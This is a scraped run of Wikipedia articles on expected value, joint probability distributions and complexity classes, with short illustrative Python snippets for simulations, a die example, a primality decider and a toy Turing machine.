X}pointwise. Thus, one cannot interchange limits and expectation, without additional conditions on the random variables. To see this, letU{\displaystyle U}be a random variable distributed uniformly on[0,1].{\displaystyle [0,1].}Forn≥1,{\displaystyle n\geq 1,}define a sequence of random variablesXn=n⋅1{U∈(0,1n)},{\displaystyle X_{n}=n\cdot \mathbf {1} \left\{U\in \left(0,{\tfrac {1}{n}}\right)\right\},}with1{A}{\displaystyle \mathbf {1} \{A\}}being the indicator function of the eventA.{\displaystyle A.}Then, it follows thatXn→0{\displaystyle X_{n}\to 0}pointwise. But,E⁡[Xn]=n⋅Pr(U∈[0,1n])=n⋅1n=1{\displaystyle \operatorname {E} [X_{n}]=n\cdot \Pr \left(U\in \left[0,{\tfrac {1}{n}}\right]\right)=n\cdot {\tfrac {1}{n}}=1}for eachn.{\displaystyle n.}Hence,limn→∞E⁡[Xn]=1≠0=E⁡[limn→∞Xn].{\displaystyle \lim _{n\to \infty }\operatorname {E} [X_{n}]=1\neq 0=\operatorname {E} \left[\lim _{n\to \infty }X_{n}\right].} Analogously, for general sequence of random variables{Yn:n≥0},{\displaystyle \{Y_{n}:n\geq 0\},}the expected value operator is notσ{\displaystyle \sigma }-additive, i.e.E⁡[∑n=0∞Yn]≠∑n=0∞E⁡[Yn].{\displaystyle \operatorname {E} \left[\sum _{n=0}^{\infty }Y_{n}\right]\neq \sum _{n=0}^{\infty }\operatorname {E} [Y_{n}].} An example is easily obtained by settingY0=X1{\displaystyle Y_{0}=X_{1}}andYn=Xn+1−Xn{\displaystyle Y_{n}=X_{n+1}-X_{n}}forn≥1,{\displaystyle n\geq 1,}whereXn{\displaystyle X_{n}}is as in the previous example. 
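The counterexample above can also be checked by simulation. The sketch below, which assumes NumPy and uses an arbitrary sample size, estimates E[X_n] for several n and shows it staying near 1 even though X_n(u) is eventually 0 for every fixed u > 0.

```python
import numpy as np

rng = np.random.default_rng(1)
U = rng.uniform(0.0, 1.0, 1_000_000)

for n in (10, 100, 1000, 10000):
    X_n = n * (U < 1.0 / n)          # X_n = n on the event {U < 1/n}, else 0
    print(n, round(X_n.mean(), 3))   # sample mean stays near 1 for every n

# Yet for each fixed sample point u > 0, X_n(u) = 0 once n > 1/u, so X_n -> 0
# pointwise while E[X_n] = 1: limits and expectations cannot be swapped here.
```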
A number of convergence results specify exact conditions which allow one to interchange limits and expectations, as specified below. The probability density functionfX{\displaystyle f_{X}}of a scalar random variableX{\displaystyle X}is related to itscharacteristic functionφX{\displaystyle \varphi _{X}}by the inversion formula:fX(x)=12π∫Re−itxφX(t)dt.{\displaystyle f_{X}(x)={\frac {1}{2\pi }}\int _{\mathbb {R} }e^{-itx}\varphi _{X}(t)\,dt.} For the expected value ofg(X){\displaystyle g(X)}(whereg:R→R{\displaystyle g:{\mathbb {R} }\to {\mathbb {R} }}is aBorel function), we can use this inversion formula to obtainE⁡[g(X)]=12π∫Rg(x)[∫Re−itxφX(t)dt]dx.{\displaystyle \operatorname {E} [g(X)]={\frac {1}{2\pi }}\int _{\mathbb {R} }g(x)\left[\int _{\mathbb {R} }e^{-itx}\varphi _{X}(t)\,dt\right]dx.} IfE⁡[g(X)]{\displaystyle \operatorname {E} [g(X)]}is finite, changing the order of integration, we get, in accordance withFubini–Tonelli theorem,E⁡[g(X)]=12π∫RG(t)φX(t)dt,{\displaystyle \operatorname {E} [g(X)]={\frac {1}{2\pi }}\int _{\mathbb {R} }G(t)\varphi _{X}(t)\,dt,}whereG(t)=∫Rg(x)e−itxdx{\displaystyle G(t)=\int _{\mathbb {R} }g(x)e^{-itx}\,dx}is theFourier transformofg(x).{\displaystyle g(x).}The expression forE⁡[g(X)]{\displaystyle \operatorname {E} [g(X)]}also follows directly from thePlancherel theorem. The expectation of a random variable plays an important role in a variety of contexts. Instatistics, where one seeksestimatesfor unknownparametersbased on available data gained fromsamples, thesample meanserves as an estimate for the expectation, and is itself a random variable. In such settings, the sample mean is considered to meet the desirable criterion for a "good" estimator in beingunbiased; that is, the expected value of the estimate is equal to thetrue valueof the underlying parameter. For a different example, indecision theory, an agent making an optimal choice in the context of incomplete information is often assumed to maximize the expected value of theirutility function. It is possible to construct an expected value equal to the probability of an event by taking the expectation of anindicator functionthat is one if the event has occurred and zero otherwise. This relationship can be used to translate properties of expected values into properties of probabilities, e.g. using thelaw of large numbersto justify estimating probabilities byfrequencies. The expected values of the powers ofXare called themomentsofX; themoments about the meanofXare expected values of powers ofX− E[X]. The moments of some random variables can be used to specify their distributions, via theirmoment generating functions. To empirically estimate the expected value of a random variable, one repeatedly measures observations of the variable and computes thearithmetic meanof the results. If the expected value exists, this procedure estimates the true expected value in an unbiased manner and has the property of minimizing the sum of the squares of theresiduals(the sum of the squared differences between the observations and the estimate). The law of large numbers demonstrates (under fairly mild conditions) that, as thesizeof the sample gets larger, thevarianceof this estimate gets smaller. 
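A minimal simulation of that shrinking-variance property, assuming NumPy and using an exponential distribution with mean 0.5 chosen purely for illustration:

```python
import numpy as np

rng = np.random.default_rng(2)
true_mean = 0.5                            # exponential with scale 0.5 has mean 0.5

for n in (100, 10_000, 1_000_000):
    sample = rng.exponential(scale=true_mean, size=n)
    estimate = sample.mean()               # the sample mean as an estimator of E[X]
    print(n, round(estimate, 4), round(abs(estimate - true_mean), 4))
# The absolute error typically shrinks roughly like 1/sqrt(n) as n grows.
```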
This property is often exploited in a wide variety of applications, including general problems ofstatistical estimationandmachine learning, to estimate (probabilistic) quantities of interest viaMonte Carlo methods, since most quantities of interest can be written in terms of expectation, e.g.P⁡(X∈A)=E⁡[1A],{\displaystyle \operatorname {P} ({X\in {\mathcal {A}}})=\operatorname {E} [{\mathbf {1} }_{\mathcal {A}}],}where1A{\displaystyle {\mathbf {1} }_{\mathcal {A}}}is the indicator function of the setA.{\displaystyle {\mathcal {A}}.} Inclassical mechanics, thecenter of massis an analogous concept to expectation. For example, supposeXis a discrete random variable with valuesxiand corresponding probabilitiespi.Now consider a weightless rod on which are placed weights, at locationsxialong the rod and having massespi(whose sum is one). The point at which the rod balances is E[X]. Expected values can also be used to compute the variance, by means of the computational formula for the varianceVar⁡(X)=E⁡[X2]−(E⁡[X])2.{\displaystyle \operatorname {Var} (X)=\operatorname {E} [X^{2}]-(\operatorname {E} [X])^{2}.} A very important application of the expectation value is in the field ofquantum mechanics. Theexpectation value of a quantum mechanical operatorA^{\displaystyle {\hat {A}}}operating on aquantum statevector|ψ⟩{\displaystyle |\psi \rangle }is written as⟨A^⟩=⟨ψ|A^|ψ⟩.{\displaystyle \langle {\hat {A}}\rangle =\langle \psi |{\hat {A}}|\psi \rangle .}TheuncertaintyinA^{\displaystyle {\hat {A}}}can be calculated by the formula(ΔA)2=⟨A^2⟩−⟨A^⟩2{\displaystyle (\Delta A)^{2}=\langle {\hat {A}}^{2}\rangle -\langle {\hat {A}}\rangle ^{2}}.
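To ground the quantum-mechanical formulas above, here is a small NumPy sketch for a two-level system; the operator (Pauli-Z) and the state amplitudes are arbitrary choices made for illustration.

```python
import numpy as np

# Pauli-Z as a 2x2 Hermitian operator, and a normalized state vector |psi>.
A   = np.array([[1, 0], [0, -1]], dtype=complex)
psi = np.array([np.sqrt(0.8), np.sqrt(0.2)], dtype=complex)

exp_A  = np.vdot(psi, A @ psi).real            # <psi| A |psi>
exp_A2 = np.vdot(psi, (A @ A) @ psi).real      # <psi| A^2 |psi>
uncertainty = np.sqrt(exp_A2 - exp_A ** 2)

print(round(exp_A, 3))          # 0.6, i.e. 0.8 - 0.2
print(round(uncertainty, 3))    # 0.8
```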
https://en.wikipedia.org/wiki/Expected_value
Givenrandom variablesX,Y,…{\displaystyle X,Y,\ldots }, that are defined on the same[1]probability space, themultivariateorjoint probability distributionforX,Y,…{\displaystyle X,Y,\ldots }is aprobability distributionthat gives the probability that each ofX,Y,…{\displaystyle X,Y,\ldots }falls in any particular range or discrete set of values specified for that variable. In the case of only two random variables, this is called abivariate distribution, but the concept generalizes to any number of random variables. The joint probability distribution can be expressed in terms of a jointcumulative distribution functionand either in terms of a jointprobability density function(in the case ofcontinuous variables) or jointprobability mass function(in the case ofdiscretevariables). These in turn can be used to find two other types of distributions: themarginal distributiongiving the probabilities for any one of the variables with no reference to any specific ranges of values for the other variables, and theconditional probability distributiongiving the probabilities for any subset of the variables conditional on particular values of the remaining variables. Each of two urns contains twice as many red balls as blue balls, and no others, and one ball is randomly selected from each urn, with the two draws independent of each other. LetA{\displaystyle A}andB{\displaystyle B}be discrete random variables associated with the outcomes of the draw from the first urn and second urn respectively. The probability of drawing a red ball from either of the urns is⁠2/3⁠, and the probability of drawing a blue ball is⁠1/3⁠. The joint probability distribution is presented in the following table: Each of the four inner cells shows the probability of a particular combination of results from the two draws; these probabilities are the joint distribution. In any one cell the probability of a particular combination occurring is (since the draws are independent) the product of the probability of the specified result for A and the probability of the specified result for B. The probabilities in these four cells sum to 1, as with all probability distributions. Moreover, the final row and the final column give themarginal probability distributionfor A and the marginal probability distribution for B respectively. For example, for A the first of these cells gives the sum of the probabilities for A being red, regardless of which possibility for B in the column above the cell occurs, as⁠2/3⁠. Thus the marginal probability distribution forA{\displaystyle A}givesA{\displaystyle A}'s probabilitiesunconditionalonB{\displaystyle B}, in a margin of the table. Consider the flip of twofair coins; letA{\displaystyle A}andB{\displaystyle B}be discrete random variables associated with the outcomes of the first and second coin flips respectively. Each coin flip is aBernoulli trialand has aBernoulli distribution. If a coin displays "heads" then the associated random variable takes the value 1, and it takes the value 0 otherwise. The probability of each of these outcomes is⁠1/2⁠, so the marginal (unconditional) density functions are The joint probability mass function ofA{\displaystyle A}andB{\displaystyle B}defines probabilities for each pair of outcomes. 
All possible outcomes are Since each outcome is equally likely the joint probability mass function becomes Since the coin flips are independent, the joint probability mass function is the product of the marginals: Consider the roll of a fairdieand letA=1{\displaystyle A=1}if the number is even (i.e. 2, 4, or 6) andA=0{\displaystyle A=0}otherwise. Furthermore, letB=1{\displaystyle B=1}if the number is prime (i.e. 2, 3, or 5) andB=0{\displaystyle B=0}otherwise. Then, the joint distribution ofA{\displaystyle A}andB{\displaystyle B}, expressed as a probability mass function, is These probabilities necessarily sum to 1, since the probability ofsomecombination ofA{\displaystyle A}andB{\displaystyle B}occurring is 1. If more than one random variable is defined in a random experiment, it is important to distinguish between the joint probability distribution of X and Y and the probability distribution of each variable individually. The individual probability distribution of a random variable is referred to as its marginal probability distribution. In general, the marginal probability distribution of X can be determined from the joint probability distribution of X and other random variables. If the joint probability density function of random variable X and Y isfX,Y(x,y){\displaystyle f_{X,Y}(x,y)}, the marginal probability density function of X and Y, which defines themarginal distribution, is given by: fX(x)=∫fX,Y(x,y)dy{\displaystyle f_{X}(x)=\int f_{X,Y}(x,y)\;dy}fY(y)=∫fX,Y(x,y)dx{\displaystyle f_{Y}(y)=\int f_{X,Y}(x,y)\;dx} where the first integral is over all points in the range of (X,Y) for which X=x and the second integral is over all points in the range of (X,Y) for which Y=y.[2] For a pair of random variablesX,Y{\displaystyle X,Y}, the joint cumulative distribution function (CDF)FX,Y{\displaystyle F_{X,Y}}is given by[3]: p. 89 where the right-hand side represents theprobabilitythat the random variableX{\displaystyle X}takes on a value less than or equal tox{\displaystyle x}andthatY{\displaystyle Y}takes on a value less than or equal toy{\displaystyle y}. ForN{\displaystyle N}random variablesX1,…,XN{\displaystyle X_{1},\ldots ,X_{N}}, the joint CDFFX1,…,XN{\displaystyle F_{X_{1},\ldots ,X_{N}}}is given by Interpreting theN{\displaystyle N}random variables as arandom vectorX=(X1,…,XN)T{\displaystyle \mathbf {X} =(X_{1},\ldots ,X_{N})^{T}}yields a shorter notation: The jointprobability mass functionof twodiscrete random variablesX,Y{\displaystyle X,Y}is: or written in terms of conditional distributions whereP(Y=y∣X=x){\displaystyle \mathrm {P} (Y=y\mid X=x)}is theprobabilityofY=y{\displaystyle Y=y}given thatX=x{\displaystyle X=x}. The generalization of the preceding two-variable case is the joint probability distribution ofn{\displaystyle n\,}discrete random variablesX1,X2,…,Xn{\displaystyle X_{1},X_{2},\dots ,X_{n}}which is: or equivalently This identity is known as thechain rule of probability. 
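The fair-die example above can be tabulated directly. The sketch below builds the joint probability mass function of A (even) and B (prime), recovers the marginals by summing out the other variable, and confirms that A and B are not independent; exact fractions are used for clarity.

```python
from fractions import Fraction
from collections import defaultdict

# Fair die: A = 1 if the roll is even, B = 1 if the roll is prime.
joint = defaultdict(Fraction)
for roll in range(1, 7):
    a = int(roll % 2 == 0)
    b = int(roll in (2, 3, 5))
    joint[(a, b)] += Fraction(1, 6)
# joint: (0,0) -> 1/6 (roll 1), (0,1) -> 1/3 (rolls 3,5),
#        (1,0) -> 1/3 (rolls 4,6), (1,1) -> 1/6 (roll 2)

# Marginals, obtained by summing out the other variable.
pA = {a: sum(p for (x, _), p in joint.items() if x == a) for a in (0, 1)}
pB = {b: sum(p for (_, y), p in joint.items() if y == b) for b in (0, 1)}
print(pA, pB)                            # each assigns probability 1/2 to 0 and to 1

# A and B are not independent: P(A=1, B=1) = 1/6, but P(A=1) * P(B=1) = 1/4.
print(joint[(1, 1)] == pA[1] * pB[1])    # False
```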
Since these are probabilities, in the two-variable case which generalizes forn{\displaystyle n\,}discrete random variablesX1,X2,…,Xn{\displaystyle X_{1},X_{2},\dots ,X_{n}}to Thejointprobability density functionfX,Y(x,y){\displaystyle f_{X,Y}(x,y)}for twocontinuous random variablesis defined as the derivative of the joint cumulative distribution function (seeEq.1): This is equal to: wherefY∣X(y∣x){\displaystyle f_{Y\mid X}(y\mid x)}andfX∣Y(x∣y){\displaystyle f_{X\mid Y}(x\mid y)}are theconditional distributionsofY{\displaystyle Y}givenX=x{\displaystyle X=x}and ofX{\displaystyle X}givenY=y{\displaystyle Y=y}respectively, andfX(x){\displaystyle f_{X}(x)}andfY(y){\displaystyle f_{Y}(y)}are themarginal distributionsforX{\displaystyle X}andY{\displaystyle Y}respectively. The definition extends naturally to more than two random variables: Again, since these are probability distributions, one has respectively The "mixed joint density" may be defined where one or more random variables are continuous and the other random variables are discrete. With one variable of each type One example of a situation in which one may wish to find the cumulative distribution of one random variable which is continuous and another random variable which is discrete arises when one wishes to use alogistic regressionin predicting the probability of a binary outcome Y conditional on the value of a continuously distributed outcomeX{\displaystyle X}. Onemustuse the "mixed" joint density when finding the cumulative distribution of this binary outcome because the input variables(X,Y){\displaystyle (X,Y)}were initially defined in such a way that one could not collectively assign it either a probability density function or a probability mass function. Formally,fX,Y(x,y){\displaystyle f_{X,Y}(x,y)}is the probability density function of(X,Y){\displaystyle (X,Y)}with respect to theproduct measureon the respectivesupportsofX{\displaystyle X}andY{\displaystyle Y}. Either of these two decompositions can then be used to recover the joint cumulative distribution function: The definition generalizes to a mixture of arbitrary numbers of discrete and continuous random variables. In general two random variablesX{\displaystyle X}andY{\displaystyle Y}areindependentif and only if the joint cumulative distribution function satisfies Two discrete random variablesX{\displaystyle X}andY{\displaystyle Y}are independent if and only if the joint probability mass function satisfies for allx{\displaystyle x}andy{\displaystyle y}. While the number of independent random events grows, the related joint probability value decreases rapidly to zero, according to a negative exponential law. Similarly, two absolutely continuous random variables are independent if and only if for allx{\displaystyle x}andy{\displaystyle y}. This means that acquiring any information about the value of one or more of the random variables leads to a conditional distribution of any other variable that is identical to its unconditional (marginal) distribution; thus no variable provides any information about any other variable. If a subsetA{\displaystyle A}of the variablesX1,⋯,Xn{\displaystyle X_{1},\cdots ,X_{n}}isconditionally dependentgiven another subsetB{\displaystyle B}of these variables, then the probability mass function of the joint distribution isP(X1,…,Xn){\displaystyle \mathrm {P} (X_{1},\ldots ,X_{n})}.P(X1,…,Xn){\displaystyle \mathrm {P} (X_{1},\ldots ,X_{n})}is equal toP(B)⋅P(A∣B){\displaystyle P(B)\cdot P(A\mid B)}. 
Therefore, it can be efficiently represented by the lower-dimensional probability distributionsP(B){\displaystyle P(B)}andP(A∣B){\displaystyle P(A\mid B)}. Such conditional independence relations can be represented with aBayesian networkorcopula functions. When two or more random variables are defined on a probability space, it is useful to describe how they vary together; that is, it is useful to measure the relationship between the variables. A common measure of the relationship between two random variables is the covariance. Covariance is a measure of linear relationship between the random variables. If the relationship between the random variables is nonlinear, the covariance might not be sensitive to the relationship, which means, it does not relate the correlation between two variables. The covariance between the random variablesX{\displaystyle X}andY{\displaystyle Y}is[4] There is another measure of the relationship between two random variables that is often easier to interpret than the covariance. The correlation just scales the covariance by the product of the standard deviation of each variable. Consequently, the correlation is a dimensionless quantity that can be used to compare the linear relationships between pairs of variables in different units. If the points in the joint probability distribution of X and Y that receive positive probability tend to fall along a line of positive (or negative) slope, ρXYis near +1 (or −1). If ρXYequals +1 or −1, it can be shown that the points in the joint probability distribution that receive positive probability fall exactly along a straight line. Two random variables with nonzero correlation are said to be correlated. Similar to covariance, the correlation is a measure of the linear relationship between random variables. The correlation coefficient between the random variablesX{\displaystyle X}andY{\displaystyle Y}is Named joint distributions that arise frequently in statistics include themultivariate normal distribution, themultivariate stable distribution, themultinomial distribution, thenegative multinomial distribution, themultivariate hypergeometric distribution, and theelliptical distribution.
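A small sketch of covariance and correlation, and of the caveat above that covariance only captures linear association: Y1 depends linearly on X and is strongly correlated with it, while Y2 = X^2 is completely determined by X yet has covariance near zero. NumPy is assumed and all parameters are arbitrary.

```python
import numpy as np

rng = np.random.default_rng(3)
X  = rng.normal(0.0, 1.0, 200_000)
Y1 = 2.0 * X + rng.normal(0.0, 0.5, 200_000)   # linear relationship plus noise
Y2 = X ** 2                                     # nonlinear, but fully determined by X

print(round(np.corrcoef(X, Y1)[0, 1], 2))   # close to +0.97: strong linear relation
print(round(np.cov(X, Y2)[0, 1], 2))        # close to 0: covariance misses Y2 = X^2
```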
https://en.wikipedia.org/wiki/Joint_probability_distribution
Incomputational complexity theory, acomplexity classis asetofcomputational problems"of related resource-basedcomplexity".[1]The two most commonly analyzed resources aretimeandmemory. In general, a complexity class is defined in terms of a type of computational problem, amodel of computation, and a bounded resource liketimeormemory. In particular, most complexity classes consist ofdecision problemsthat are solvable with aTuring machine, and are differentiated by their time or space (memory) requirements. For instance, the classPis the set of decision problems solvable by a deterministic Turing machine inpolynomial time. There are, however, many complexity classes defined in terms of other types of problems (e.g.counting problemsandfunction problems) and using other models of computation (e.g.probabilistic Turing machines,interactive proof systems,Boolean circuits, andquantum computers). The study of the relationships between complexity classes is a major area of research intheoretical computer science. There are often general hierarchies of complexity classes; for example, it is known that a number of fundamental time and space complexity classes relate to each other in the following way:L⊆NL⊆P⊆NP⊆PSPACE⊆EXPTIME⊆NEXPTIME⊆EXPSPACE(where ⊆ denotes thesubsetrelation). However, many relationships are not yet known; for example, one of the most famousopen problemsin computer science concerns whetherPequalsNP. The relationships between classes often answer questions about the fundamental nature of computation. ThePversusNPproblem, for instance, is directly related to questions of whethernondeterminismadds any computational power to computers and whether problems having solutions that can be quickly checked for correctness can also be quickly solved. Complexity classes aresetsof relatedcomputational problems. They are defined in terms of the computational difficulty of solving the problems contained within them with respect to particular computational resources like time or memory. More formally, the definition of a complexity class consists of three things: a type of computational problem, a model of computation, and a bounded computational resource. In particular, most complexity classes consist ofdecision problemsthat can be solved by aTuring machinewith boundedtimeorspaceresources. For example, the complexity classPis defined as the set ofdecision problemsthat can be solved by adeterministic Turing machineinpolynomial time. Intuitively, acomputational problemis just a question that can be solved by analgorithm. For example, "is thenatural numbern{\displaystyle n}prime?" is a computational problem. A computational problem is mathematically represented as thesetof answers to the problem. In the primality example, the problem (call itPRIME{\displaystyle {\texttt {PRIME}}}) is represented by the set of all natural numbers that are prime:PRIME={n∈N|nis prime}{\displaystyle {\texttt {PRIME}}=\{n\in \mathbb {N} |n{\text{ is prime}}\}}. In the theory of computation, these answers are represented asstrings; for example, in the primality example the natural numbers could be represented as strings ofbitsthat representbinary numbers. For this reason, computational problems are often synonymously referred to as languages, since strings of bits representformal languages(a concept borrowed fromlinguistics); for example, saying that thePRIME{\displaystyle {\texttt {PRIME}}}problem is in the complexity classPis equivalent to saying that the languagePRIME{\displaystyle {\texttt {PRIME}}}is inP. 
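As an illustrative sketch only, the following decider treats PRIME as a language of binary strings and answers accept or reject for membership. It uses trial division, which is not the polynomial-time algorithm that places PRIME in P; the function name and encoding are choices made here.

```python
# A decider for the language PRIME over binary encodings of natural numbers:
# accept iff the encoded number is prime. Trial division is for illustration
# only; its running time is exponential in the length of the input string.
def decide_prime(bits: str) -> bool:
    n = int(bits, 2)
    if n < 2:
        return False                      # reject
    d = 2
    while d * d <= n:
        if n % d == 0:
            return False                  # reject: composite
        d += 1
    return True                           # accept: the string is in PRIME

print(decide_prime(bin(97)[2:]))          # True  (97 is prime)
print(decide_prime(bin(100)[2:]))         # False
```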
The most commonly analyzed problems in theoretical computer science aredecision problems—the kinds of problems that can be posed asyes–no questions. The primality example above, for instance, is an example of a decision problem as it can be represented by the yes–no question "is thenatural numbern{\displaystyle n}prime". In terms of the theory of computation, a decision problem is represented as the set of input strings that a computer running a correctalgorithmwould answer "yes" to. In the primality example,PRIME{\displaystyle {\texttt {PRIME}}}is the set of strings representing natural numbers that, when input into a computer running an algorithm that correctlytests for primality, the algorithm answers "yes, this number is prime". This "yes-no" format is often equivalently stated as "accept-reject"; that is, an algorithm "accepts" an input string if the answer to the decision problem is "yes" and "rejects" if the answer is "no". While some problems cannot easily be expressed as decision problems, they nonetheless encompass a broad range of computational problems.[2]Other types of problems that certain complexity classes are defined in terms of include: To make concrete the notion of a "computer", in theoretical computer science problems are analyzed in the context of acomputational model. Computational models make exact the notions of computational resources like "time" and "memory". Incomputational complexity theory, complexity classes deal with theinherentresource requirements of problems and not the resource requirements that depend upon how a physical computer is constructed. For example, in the real world different computers may require different amounts of time and memory to solve the same problem because of the way that they have been engineered. By providing an abstract mathematical representations of computers, computational models abstract away superfluous complexities of the real world (like differences inprocessorspeed) that obstruct an understanding of fundamental principles. The most commonly used computational model is theTuring machine. While other models exist and many complexity classes are defined in terms of them (see section"Other models of computation"), the Turing machine is used to define most basic complexity classes. With the Turing machine, instead of using standard units of time like the second (which make it impossible to disentangle running time from the speed of physical hardware) and standard units of memory likebytes, the notion of time is abstracted as the number of elementary steps that a Turing machine takes to solve a problem and the notion of memory is abstracted as the number of cells that are used on the machine's tape. These are explained in greater detail below. It is also possible to use theBlum axiomsto define complexity classes without referring to a concretecomputational model, but this approach is less frequently used in complexity theory. ATuring machineis a mathematical model of a general computing machine. It is the most commonly used model in complexity theory, owing in large part to the fact that it is believed to be as powerful as any other model of computation and is easy to analyze mathematically. Importantly, it is believed that if there exists an algorithm that solves a particular problem then there also exists a Turing machine that solves that same problem (this is known as theChurch–Turing thesis); this means that it is believed thateveryalgorithm can be represented as a Turing machine. 
Mechanically, a Turing machine (TM) manipulates symbols (generally restricted to the bits 0 and 1 to provide an intuitive connection to real-life computers) contained on an infinitely long strip of tape. The TM can read and write, one at a time, using a tape head. Operation is fully determined by a finite set of elementary instructions such as "in state 42, if the symbol seen is 0, write a 1; if the symbol seen is 1, change into state 17; in state 17, if the symbol seen is 0, write a 1 and change to state 6". The Turing machine starts with only the input string on its tape and blanks everywhere else. The TM accepts the input if it enters a designated accept state and rejects the input if it enters a reject state. The deterministic Turing machine (DTM) is the most basic type of Turing machine. It uses a fixed set of rules to determine its future actions (which is why it is called "deterministic"). A computational problem can then be defined in terms of a Turing machine as the set of input strings that a particular Turing machine accepts. For example, the primality problemPRIME{\displaystyle {\texttt {PRIME}}}from above is the set of strings (representing natural numbers) that a Turing machine running an algorithm that correctlytests for primalityaccepts. A Turing machine is said torecognizea language (recall that "problem" and "language" are largely synonymous in computability and complexity theory) if it accepts all inputs that are in the language and is said todecidea language if it additionally rejects all inputs that are not in the language (certain inputs may cause a Turing machine to run forever, sodecidabilityplaces the additional constraint overrecognizabilitythat the Turing machine must halt on all inputs). A Turing machine that "solves" a problem is generally meant to mean one that decides the language. Turing machines enable intuitive notions of "time" and "space". Thetime complexityof a TM on a particular input is the number of elementary steps that the Turing machine takes to reach either an accept or reject state. Thespace complexityis the number of cells on its tape that it uses to reach either an accept or reject state. The deterministic Turing machine (DTM) is a variant of the nondeterministic Turing machine (NTM). Intuitively, an NTM is just a regular Turing machine that has the added capability of being able to explore multiple possible future actions from a given state, and "choosing" a branch that accepts (if any accept). That is, while a DTM must follow only one branch of computation, an NTM can be imagined as a computation tree, branching into many possible computational pathways at each step (see image). If at least one branch of the tree halts with an "accept" condition, then the NTM accepts the input. In this way, an NTM can be thought of as simultaneously exploring all computational possibilities in parallel and selecting an accepting branch.[3]NTMs are not meant to be physically realizable models, they are simply theoretically interesting abstract machines that give rise to a number of interesting complexity classes (which often do have physically realizable equivalent definitions). Thetime complexityof an NTM is the maximum number of steps that the NTM uses onanybranch of its computation.[4]Similarly, thespace complexityof an NTM is the maximum number of cells that the NTM uses on any branch of its computation. DTMs can be viewed as a special case of NTMs that do not make use of the power of nondeterminism. 
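To make the mechanics above concrete, here is a minimal deterministic Turing machine simulator; the machine, alphabet, and state names are invented here for illustration. It also counts elementary steps and distinct tape cells visited, anticipating the time and space measures discussed next.

```python
# A minimal deterministic Turing machine simulator that counts elementary steps
# (time) and distinct tape cells visited (space). The toy machine below flips
# every bit of its input and then halts in the accept state.
def run_dtm(transitions, input_str, start="q0", accept="qa", reject="qr", blank="_"):
    tape = dict(enumerate(input_str))
    state, head, steps, visited = start, 0, 0, {0}
    while state not in (accept, reject):
        symbol = tape.get(head, blank)
        state, write, move = transitions[(state, symbol)]
        tape[head] = write
        head += 1 if move == "R" else -1
        visited.add(head)
        steps += 1
    return state == accept, steps, len(visited)

flip_bits = {
    ("q0", "0"): ("q0", "1", "R"),
    ("q0", "1"): ("q0", "0", "R"),
    ("q0", "_"): ("qa", "_", "R"),
}
print(run_dtm(flip_bits, "10110"))   # (True, 6, 7): accepted after 6 steps, 7 cells touched
```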
Hence, every computation that can be carried out by a DTM can also be carried out by an equivalent NTM. It is also possible to simulate any NTM using a DTM (the DTM will simply compute every possible computational branch one-by-one). Hence, the two are equivalent in terms of computability. However, simulating an NTM with a DTM often requires greater time and/or memory resources; as will be seen, how significant this slowdown is for certain classes of computational problems is an important question in computational complexity theory. Complexity classes group computational problems by their resource requirements. To do this, computational problems are differentiated byupper boundson the maximum amount of resources that the most efficient algorithm takes to solve them. More specifically, complexity classes are concerned with therate of growthin the resources required to solve particular computational problems as the input size increases. For example, the amount of time it takes to solve problems in the complexity classPgrows at apolynomialrate as the input size increases, which is comparatively slow compared to problems in the exponential complexity classEXPTIME(or more accurately, for problems inEXPTIMEthat are outside ofP, sinceP⊆EXPTIME{\displaystyle {\mathsf {P}}\subseteq {\mathsf {EXPTIME}}}). Note that the study of complexity classes is intended primarily to understand theinherentcomplexity required to solve computational problems. Complexity theorists are thus generally concerned with finding the smallest complexity class that a problem falls into and are therefore concerned with identifying which class a computational problem falls into using themost efficientalgorithm. There may be an algorithm, for instance, that solves a particular problem in exponential time, but if the most efficient algorithm for solving this problem runs in polynomial time then the inherent time complexity of that problem is better described as polynomial. Thetime complexityof an algorithm with respect to the Turing machine model is the number of steps it takes for a Turing machine to run an algorithm on a given input size. Formally, the time complexity for an algorithm implemented with a Turing machineM{\displaystyle M}is defined as the functiontM:N→N{\displaystyle t_{M}:\mathbb {N} \to \mathbb {N} }, wheretM(n){\displaystyle t_{M}(n)}is the maximum number of steps thatM{\displaystyle M}takes on any input of lengthn{\displaystyle n}. In computational complexity theory, theoretical computer scientists are concerned less with particular runtime values and more with the general class of functions that the time complexity function falls into. For instance, is the time complexity function apolynomial? Alogarithmic function? Anexponential function? Or another kind of function? Thespace complexityof an algorithm with respect to the Turing machine model is the number of cells on the Turing machine's tape that are required to run an algorithm on a given input size. Formally, the space complexity of an algorithm implemented with a Turing machineM{\displaystyle M}is defined as the functionsM:N→N{\displaystyle s_{M}:\mathbb {N} \to \mathbb {N} }, wheresM(n){\displaystyle s_{M}(n)}is the maximum number of cells thatM{\displaystyle M}uses on any input of lengthn{\displaystyle n}. Complexity classes are often defined using granular sets of complexity classes calledDTIMEandNTIME(for time complexity) andDSPACEandNSPACE(for space complexity). 
Using big O notation, these families of classes are defined as follows: DTIME(t(n)) and NTIME(t(n)) are the classes of problems solvable by a deterministic and a nondeterministic Turing machine, respectively, within O(t(n)) steps, while DSPACE(s(n)) and NSPACE(s(n)) are the classes of problems solvable by a deterministic and a nondeterministic Turing machine, respectively, using O(s(n)) tape cells.

P is the class of problems that are solvable by a deterministic Turing machine in polynomial time and NP is the class of problems that are solvable by a nondeterministic Turing machine in polynomial time. Or more formally, P = ⋃_{k∈N} DTIME(n^k) and NP = ⋃_{k∈N} NTIME(n^k). P is often said to be the class of problems that can be solved "quickly" or "efficiently" by a deterministic computer, since the time complexity of solving a problem in P increases relatively slowly with the input size.

An important characteristic of the class NP is that it can be equivalently defined as the class of problems whose solutions are verifiable by a deterministic Turing machine in polynomial time. That is, a language is in NP if there exists a deterministic polynomial-time Turing machine, referred to as the verifier, that takes as input a string w and a polynomial-size certificate string c, and accepts w if w is in the language and rejects w if w is not in the language. Intuitively, the certificate acts as a proof that the input w is in the language. Formally:[5] a language L is in NP if and only if there exist a polynomial p and a polynomial-time verifier V such that a string w is in L exactly when there is a certificate c with |c| ≤ p(|w|) for which V accepts the pair (w, c). This equivalence between the nondeterministic definition and the verifier definition highlights a fundamental connection between nondeterminism and solution verifiability. Furthermore, it also provides a useful method for proving that a language is in NP—simply identify a suitable certificate and show that it can be verified in polynomial time.

